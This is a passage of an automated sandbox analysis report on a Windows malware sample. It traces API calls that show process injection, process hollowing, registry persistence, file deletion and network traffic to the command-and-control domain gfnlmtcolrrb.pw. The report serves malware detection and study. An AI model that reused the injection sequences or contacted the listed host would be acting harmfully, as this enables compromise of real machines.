2828 33908b9 2828->2824 2829->2821 2833 3390885 RegSetValueExA 2830->2833 2832 33908e5 2831->2832 2834 33914bc 4 API calls 2832->2834 2833->2829 2835 33908ea 2834->2835 2836 3390643 93 API calls 2835->2836 2837 33908ef CreateThread 2836->2837 2838 3390ce8 10 API calls 2837->2838 2915 33928bd 2837->2915 2839 339090b 2838->2839 2841 3390911 2839->2841 2848 339093e 2841->2848 2843 3393653 2842->2843 2844 3390873 RegCreateKeyExA 2843->2844 2845 3390885 RegSetValueExA 2844->2845 2846 339089e RegCloseKey 2845->2846 2847 3390840 2846->2847 2847->2821 2847->2823 2847->2828 2849 3390cc4 2 API calls 2848->2849 2850 339094a 2849->2850 2851 33914bc 4 API calls 2850->2851 2852 339094f 2851->2852 2853 3390954 Sleep RtlExitUserThread OpenMutexA 2852->2853 2854 339098f GetStartupInfoA 2853->2854 2855 3390af1 2853->2855 2869 33909d9 2854->2869 2855->2841 2857 33909d2 2858 3390a3d DuplicateHandle 2857->2858 2859 3390a3c 2857->2859 2865 33909de CreateProcessA 2857->2865 2860 3390aec 2858->2860 2861 3390a82 WriteProcessMemory 2858->2861 2859->2858 2883 3390af3 2860->2883 2861->2860 2863 3390ab0 ResumeThread 2861->2863 2864 3390ac1 Sleep OpenMutexA 2863->2864 2864->2855 2866 3390ae7 2864->2866 2865->2860 2867 33909ee GetThreadContext 2865->2867 2866->2860 2866->2864 2867->2860 2868 3390a16 VirtualProtectEx 2867->2868 2868->2859 2868->2860 2870 3393653 2869->2870 2871 33909de CreateProcessA 2870->2871 2872 3390aec 2871->2872 2873 33909ee GetThreadContext 2871->2873 2874 3390af3 89 API calls 2872->2874 2873->2872 2875 3390a16 VirtualProtectEx 2873->2875 2876 3390af1 2874->2876 2875->2872 2877 3390a3c DuplicateHandle 2875->2877 2876->2857 2877->2872 2879 3390a82 WriteProcessMemory 2877->2879 2879->2872 2880 3390ab0 ResumeThread 2879->2880 2881 3390ac1 Sleep OpenMutexA 2880->2881 2881->2876 2882 3390ae7 2881->2882 2882->2872 2882->2881 2885 3390b01 2883->2885 2886 3390cc4 2 API calls 2885->2886 2887 3390b0d 2886->2887 2894 3390b27 2887->2894 2889 3390b20 2890 3390b40 2889->2890 2891 3390c9c GetProcAddress 2889->2891 2893 3390b57 2890->2893 2901 3390b65 2890->2901 2891->2890 2895 3393653 2894->2895 2896 3390b2c LoadLibraryA 2895->2896 2897 3390c9c GetProcAddress 2896->2897 2898 3390b42 2897->2898 2899 3390b65 96 API calls 2898->2899 2900 3390b57 2899->2900 2900->2889 2902 3393653 2901->2902 2903 3390b6a FindWindowA 2902->2903 2904 3390bac 2903->2904 2905 3390b74 GetWindowThreadProcessId OpenProcess 2903->2905 2907 33908b3 93 API calls 2904->2907 2905->2904 2906 3390b8e 2905->2906 2908 3390de0 3 API calls 2906->2908 2909 3390bb1 2907->2909 2911 3390b99 2908->2911 2910 3390c3f GetPEB 2909->2910 2914 3390bb6 2910->2914 2911->2904 2912 3390b9d 2911->2912 2912->2904 2913 3390ba4 ExitProcess 2912->2913 2914->2893 2916 33928cb 2915->2916 2928 3394d25 2929 3394d4e 2928->2929 2930 3394d32 2928->2930 2930->2929 2931 3394d44 SetEvent 2930->2931 2931->2929 3051 3393d46 3052 3393653 3051->3052 3053 3393d4b LoadLibraryA 3052->3053 3054 3390c9c GetProcAddress 3053->3054 3055 3393d61 3054->3055 3074 3393d86 3055->3074 3058 3390c9c GetProcAddress 3059 3393da1 3058->3059 3060 3391345 3 API calls 3059->3060 3061 3393dba 3060->3061 3062 3391345 3 API calls 3061->3062 3063 3393dd3 3062->3063 3064 3391345 3 API calls 3063->3064 3065 3393dec 3064->3065 3066 3391345 3 API calls 3065->3066 3067 3393e05 3066->3067 3068 3391345 3 API calls 3067->3068 3069 3393e1e 3068->3069 3070 3391345 3 API calls 3069->3070 3071 3393e37 3070->3071 3072 3391345 3 API calls 3071->3072 3073 3393e50 3072->3073 3075 3393653 3074->3075 3076 3393d8b LoadLibraryA 3075->3076 3077 3393da1 3076->3077 3078 3390c9c GetProcAddress 3076->3078 3079 3391345 3 API calls 3077->3079 3078->3077 3080 3393dba 3079->3080 3081 3391345 3 API calls 3080->3081 3082 3393dd3 3081->3082 3083 3391345 3 API calls 3082->3083 3084 3393dec 3083->3084 3085 3391345 3 API calls 3084->3085 3086 3393e05 3085->3086 3087 3391345 3 API calls 3086->3087 3088 3393e1e 3087->3088 3089 3391345 3 API calls 3088->3089 3090 3393e37 3089->3090 3091 3391345 3 API calls 3090->3091 3092 3393d7e LoadLibraryA 3091->3092 3092->3058 3093 3392546 3094 3392549 3093->3094 3095 3392553 3094->3095 3096 3392572 2 API calls 3094->3096 3097 33925b8 3095->3097 3098 339255e 3095->3098 3099 33925c7 ExpandEnvironmentStringsA 3095->3099 3096->3095 3097->3099 3100 3392563 lstrcat lstrcat 3098->3100 3101 33925d6 3098->3101 3099->3101 3102 33925dd lstrcat 3101->3102 3103 33925e6 3101->3103 3102->3103 3104 33925e2 3102->3104 3105 339261c 10 API calls 3103->3105 3106 339260c 3105->3106 3107 3392597 10 API calls 3106->3107 3108 3392634 3107->3108 3109 33931c6 3110 33931cb 3109->3110 3111 3392597 10 API calls 3110->3111 3112 33931e9 lstrcat 3111->3112 3113 33931f6 3112->3113 3114 33926f9 4 API calls 3113->3114 3115 3393218 3114->3115 3116 339321e GetStartupInfoA CreateProcessA CloseHandle CloseHandle 3115->3116 3117 3393276 3115->3117 3116->3117 3118 33948c6 3119 33948e1 3118->3119 3120 33947ef 19 API calls 3119->3120 3121 33948ef 3120->3121

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 03392F88 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72networkCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 307 3392f88-3392ffc call 3393653 call 3393673 call 3393558 call 339363b send 319 3392ffe 307->319 320 3393042-3393054 closesocket 307->320 321 3393001-3393015 send 319->321 321->320 322 3393017-339301c 321->322 322->321 323 339301e-3393023 322->323 324 3393026-3393038 recv 323->324 324->320 325 339303a-339303e 324->325 325->324 326 3393040 325->326 326->320
                                                                                                                                                                APIs
                                                                                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 03392FF4
                                                                                                                                                                • send.WS2_32(?,03392A30,03392A2C,00000000), ref: 0339300D
                                                                                                                                                                • recv.WS2_32(?,03392A30,00A00000,00000000), ref: 03393030
                                                                                                                                                                • closesocket.WS2_32(?), ref: 0339304A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: send$closesocketrecv
                                                                                                                                                                • String ID: gfnlmtcolrrb.pw
                                                                                                                                                                • API String ID: 3431254638-1614117810
                                                                                                                                                                • Opcode ID: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                • Instruction ID: bae06507475bace9515d3996c19dfaa7aee6746a7883948ba92cc304f5e060da
                                                                                                                                                                • Opcode Fuzzy Hash: 9574067959f33b04d739d713f0caaf9cbaae1037dcd8482bb700ab3644756bfa
                                                                                                                                                                • Instruction Fuzzy Hash: 4E2162B6B00114ABFF119E28CC84B5A7BE9EF44654F054195FE0DEB254D639ED108BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03390DE0 Relevance: 4.6, APIs: 3, Instructions: 57injectionmemorythreadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,03390D88,00000000,0000090B,00000000), ref: 03390E06
                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 03390E24
                                                                                                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000), ref: 03390E70
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocCreateMemoryProcessRemoteThreadVirtualWrite
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1718980022-0
                                                                                                                                                                • Opcode ID: 195885531eb125f92f9d64206e765e7730eee5440e80a1b8655d10872ba2d5a3
                                                                                                                                                                • Instruction ID: 82015f6d2885552f2f1f7e22f698f6822ba57af5d0037ba70fdad9777b95691c
                                                                                                                                                                • Opcode Fuzzy Hash: 195885531eb125f92f9d64206e765e7730eee5440e80a1b8655d10872ba2d5a3
                                                                                                                                                                • Instruction Fuzzy Hash: 62113D32500205FFFF219F25CC85F9A3BA9EF81B54F188051FE04BE1A9D770A521CAA8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0339292D Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 169filestringsleepCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE(03392925,00000008,?,00000000,03392811,00000000), ref: 03392932
                                                                                                                                                                  • Part of subcall function 03390C9C: GetProcAddress.KERNEL32(03392811,0339290A), ref: 03390CA9
                                                                                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 03392957
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,01400000,00003000,00000004), ref: 0339296F
                                                                                                                                                                • lstrcat.KERNEL32(00000000,0339299D), ref: 033929AC
                                                                                                                                                                • lstrcat.KERNEL32(00000000,033929D4), ref: 033929E3
                                                                                                                                                                • lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
                                                                                                                                                                  • Part of subcall function 03392683: CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0339269E
                                                                                                                                                                  • Part of subcall function 03392683: GetFileSize.KERNEL32(?,00000000), ref: 033926B7
                                                                                                                                                                  • Part of subcall function 03392683: ReadFile.KERNELBASE(0339298A,?,00000000,?,00000000), ref: 033926DB
                                                                                                                                                                  • Part of subcall function 03392683: CloseHandle.KERNEL32(0339298A), ref: 033926EC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Deletelstrcat$AddressAllocCloseCreateHandleLibraryLoadProcReadSizeSleepStartupVirtual
                                                                                                                                                                • String ID: `nIu
                                                                                                                                                                • API String ID: 3655464437-1509933002
                                                                                                                                                                • Opcode ID: eb8990545cc0a5abdb3de08b12fefd3aa46b733b25a065b3f20c183e55480bf0
                                                                                                                                                                • Instruction ID: 402dff46f4b8a87c6ad29a4c83522d146d34bded25b34600d6dd5e66d92988ae
                                                                                                                                                                • Opcode Fuzzy Hash: eb8990545cc0a5abdb3de08b12fefd3aa46b733b25a065b3f20c183e55480bf0
                                                                                                                                                                • Instruction Fuzzy Hash: 3F513576800718FEEF22EB618DC4FAB77BCEF40705F054897AA45EA055DE709680CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03390643 Relevance: 16.6, APIs: 11, Instructions: 143synchronizationCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000), ref: 0339065A
                                                                                                                                                                  • Part of subcall function 0339067C: LoadLibraryA.KERNELBASE(03390673,00000009,?,00000000), ref: 03390681
                                                                                                                                                                  • Part of subcall function 0339067C: lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
                                                                                                                                                                  • Part of subcall function 0339067C: Sleep.KERNELBASE(00001388), ref: 033906FE
                                                                                                                                                                  • Part of subcall function 0339067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
                                                                                                                                                                  • Part of subcall function 0339067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
                                                                                                                                                                  • Part of subcall function 0339067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
                                                                                                                                                                  • Part of subcall function 0339067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
                                                                                                                                                                  • Part of subcall function 0339067C: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
                                                                                                                                                                  • Part of subcall function 0339067C: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390797
                                                                                                                                                                  • Part of subcall function 0339067C: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 033907AB
                                                                                                                                                                  • Part of subcall function 033926F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 03392715
                                                                                                                                                                  • Part of subcall function 033926F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 03392732
                                                                                                                                                                  • Part of subcall function 033926F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 0339274E
                                                                                                                                                                  • Part of subcall function 033926F9: CloseHandle.KERNEL32(?), ref: 0339275F
                                                                                                                                                                  • Part of subcall function 03390811: RegCreateKeyExA.KERNELBASE(00000000,03390840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 03390876
                                                                                                                                                                  • Part of subcall function 03390811: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 0339089D
                                                                                                                                                                  • Part of subcall function 03390811: RegCloseKey.KERNELBASE(?), ref: 033908A9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile$AttributesDirectory$Close$AllocHandleLibraryLoadMutexPointerSleepValueVirtualWritelstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2311107590-0
                                                                                                                                                                • Opcode ID: 451ba8cbc3e38f52fb34ef88b6eecd67ee371e55e986b10a197f4978837e6b94
                                                                                                                                                                • Instruction ID: 95386665ed867fd216894fd17775bafcb19295b5e394f4a09591ff93e549b058
                                                                                                                                                                • Opcode Fuzzy Hash: 451ba8cbc3e38f52fb34ef88b6eecd67ee371e55e986b10a197f4978837e6b94
                                                                                                                                                                • Instruction Fuzzy Hash: B65131B2504714AFEF16AB60CC88FAA77BCEF44704F05049ABB85EF045DE705650CAA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0339067C Relevance: 15.1, APIs: 10, Instructions: 122libraryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNELBASE(03390673,00000009,?,00000000), ref: 03390681
                                                                                                                                                                  • Part of subcall function 03390C9C: GetProcAddress.KERNEL32(03392811,0339290A), ref: 03390CA9
                                                                                                                                                                  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
                                                                                                                                                                  • Part of subcall function 033906C2: lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
                                                                                                                                                                  • Part of subcall function 033906C2: Sleep.KERNELBASE(00001388), ref: 033906FE
                                                                                                                                                                  • Part of subcall function 033906C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
                                                                                                                                                                  • Part of subcall function 033906C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
                                                                                                                                                                  • Part of subcall function 033906C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
                                                                                                                                                                  • Part of subcall function 033906C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
                                                                                                                                                                  • Part of subcall function 033906C2: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
                                                                                                                                                                  • Part of subcall function 033906C2: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390797
                                                                                                                                                                  • Part of subcall function 033906C2: VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 033907AB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateDirectoryFile$AddressAllocLibraryLoadProcSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2102637170-0
                                                                                                                                                                • Opcode ID: a8df3cce69ca11ad82ae1c349e259599bdf06f4bf77717782c4d553f26b560ae
                                                                                                                                                                • Instruction ID: ec8398b071f4515d20d387dfb5cda8ee23503b99091b7ffb9b3aa5101b432d85
                                                                                                                                                                • Opcode Fuzzy Hash: a8df3cce69ca11ad82ae1c349e259599bdf06f4bf77717782c4d553f26b560ae
                                                                                                                                                                • Instruction Fuzzy Hash: F04103B2504714AFEF16AB60CCC8BAA77BCEF44700F45049AA785EF055DE709690CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033906C2 Relevance: 13.6, APIs: 9, Instructions: 97sleepmemorystringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,00000000), ref: 033906EB
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 033906FE
                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 0339071F
                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390731
                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390752
                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390764
                                                                                                                                                                  • Part of subcall function 03392597: lstrcat.KERNEL32(03392634,00000000), ref: 033925DE
                                                                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 03390785
                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 03390797
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00100000,00003000,00000004), ref: 033907AB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AttributesCreateDirectoryFile$AllocSleepVirtuallstrcatlstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2015199959-0
                                                                                                                                                                • Opcode ID: f9599e8adb29c5ebd1ea761d138e7f3780641abcf38f742bfd3d2987c2fe3e42
                                                                                                                                                                • Instruction ID: f7998f2ead70fc34796130a022800e4365d5d0b7bc868ee2fd5ec962ca7c8e77
                                                                                                                                                                • Opcode Fuzzy Hash: f9599e8adb29c5ebd1ea761d138e7f3780641abcf38f742bfd3d2987c2fe3e42
                                                                                                                                                                • Instruction Fuzzy Hash: 5531F1B2500614AFEF16AB60CCC8BAA73BCEF44744F45049EB785EF045DE709680CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 033929A6 Relevance: 10.6, APIs: 7, Instructions: 130sleepfilestringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,0339299D), ref: 033929AC
                                                                                                                                                                  • Part of subcall function 033929DD: lstrcat.KERNEL32(00000000,033929D4), ref: 033929E3
                                                                                                                                                                  • Part of subcall function 033929DD: lstrcat.KERNEL32(00000000,03392A0B), ref: 03392A1A
                                                                                                                                                                  • Part of subcall function 033929DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392A94
                                                                                                                                                                  • Part of subcall function 033929DD: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 03392AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 03392B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 03392B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: ea24b2d0948a46e09ffe2e34872151d6fffd848d6adfcb06e5263f1eabd84507
                                                                                                                                                                • Instruction ID: 55b9549200e354d718bcec4e3dac00ae64e5ae0a0dfeba9942d2dcac3be53569
                                                                                                                                                                • Opcode Fuzzy Hash: ea24b2d0948a46e09ffe2e34872151d6fffd848d6adfcb06e5263f1eabd84507
                                                                                                                                                                • Instruction Fuzzy Hash: 9C412676801718EEEF22EB61CDC4BAB77BCEF40705F044897AA45EA011DE749680CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03392F3F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 203 3392f3f-3392f7e call 3393653 call 3393673 lstrlen call 3393673 call 3392f88 213 3392fad-3392feb call 339363b 203->213 214 3392f80-3392f83 203->214 215 3392fee-3392ffc send 213->215 214->215 216 3392f86 214->216 219 3392ffe 215->219 220 3393042-3393054 closesocket 215->220 216->213 222 3393001-3393015 send 219->222 222->220 223 3393017-339301c 222->223 223->222 224 339301e-3393023 223->224 225 3393026-3393038 recv 224->225 225->220 226 339303a-339303e 225->226 226->225 227 3393040 226->227 227->220
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlen.KERNEL32(gfnlmtcolrrb.pw,00000000,03392F2E,00000011,?,00000000,00000011,00000000,/EiDQjNbWEQ/,00000000), ref: 03392F53
                                                                                                                                                                  • Part of subcall function 03392F88: send.WS2_32(?,00000000,00000000,00000000), ref: 03392FF4
                                                                                                                                                                  • Part of subcall function 03392F88: send.WS2_32(?,03392A30,03392A2C,00000000), ref: 0339300D
                                                                                                                                                                  • Part of subcall function 03392F88: recv.WS2_32(?,03392A30,00A00000,00000000), ref: 03393030
                                                                                                                                                                  • Part of subcall function 03392F88: closesocket.WS2_32(?), ref: 0339304A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: send$closesocketlstrlenrecv
                                                                                                                                                                • String ID: gfnlmtcolrrb.pw
                                                                                                                                                                • API String ID: 1577144637-1614117810
                                                                                                                                                                • Opcode ID: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
                                                                                                                                                                • Instruction ID: 60795fe64d14d6c349aa60739f59cb3592a2b0ee7f1b05195e95e623fe29fbed
                                                                                                                                                                • Opcode Fuzzy Hash: 47e1b1d1e09dae78ecab814af72e97c8beb8c55764ffd7795c611f6a9b2faa7b
                                                                                                                                                                • Instruction Fuzzy Hash: 9B21D576A00114FBFF129E24CC84F9A7BE8EF44754F084196FE09EF155D7359A108BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 03390CE8 Relevance: 10.6, APIs: 7, Instructions: 64sleepprocessCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 228 3390ce8-3390cfd 229 3390d03-3390d10 CreateToolhelp32Snapshot 228->229 229->229 230 3390d12-3390d45 Sleep Process32First 229->230 231 3390db5-3390ddb FindCloseChangeNotification Sleep 230->231 232 3390d47-3390d53 230->232 231->229 233 3390d54-3390d63 232->233 234 3390d8e-3390da6 Process32Next 233->234 235 3390d65-3390d7a 233->235 234->231 236 3390da8-3390daa 234->236 235->234 239 3390d7c-3390d88 call 3390de0 FindCloseChangeNotification 235->239 236->233 238 3390dac-3390db3 236->238 238->233 239->234
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03390D07
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 03390D1D
                                                                                                                                                                • Process32First.KERNEL32(?,00000000), ref: 03390D3D
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 03390D88
                                                                                                                                                                • Process32Next.KERNEL32(?,?), ref: 03390D9E
                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 03390DCA
                                                                                                                                                                • Sleep.KERNELBASE(000003E8), ref: 03390DD5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2897958839.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3390000_winver.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ChangeCloseFindNotificationProcess32Sleep$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1902139912-0
                                                                                                                                                                • Opcode ID: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
                                                                                                                                                                • Instruction ID: 16dfc279058c1190d120e73408589ffc03444f013b20e19f23a6e862c8318b20
                                                                                                                                                                • Opcode Fuzzy Hash: 7ef9ee58ba518d41f3acc58a6d1fc59d2da839a49c47249353964cec8b1c453b
                                                                                                                                                                • Instruction Fuzzy Hash: 3D217135901218EBFF269F54CC94BE9B7B9AF08740F0801DAE919FA1A5CB305A90CF55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0339261C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 242 339261c-339262a call 3393653 ExpandEnvironmentStringsA 245 339262c 242->245 246 3392636-3392640 242->246 247 3392634 245->247 248 339262f call 3392597 245->248 249 339266c-3392679 lstrcat 246->249 250 3392642-339265b call 339265e 246->250 251 339267f-3392680 247->251 248->247 249->251 254 33926b9-33926c6 250->254 255 339265d-3392666 lstrcat 250->255 256 33926e9-33926f6 CloseHandle 254->256 257 33926c8-33926e3 ReadFile 254->257 255->249 257->256 258 33926e5-33926e6 257->258 258->256
                                                                                                                                                                APIs
                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(0339260C,00000010,?,?,0339298A,00000104), ref: 03392621
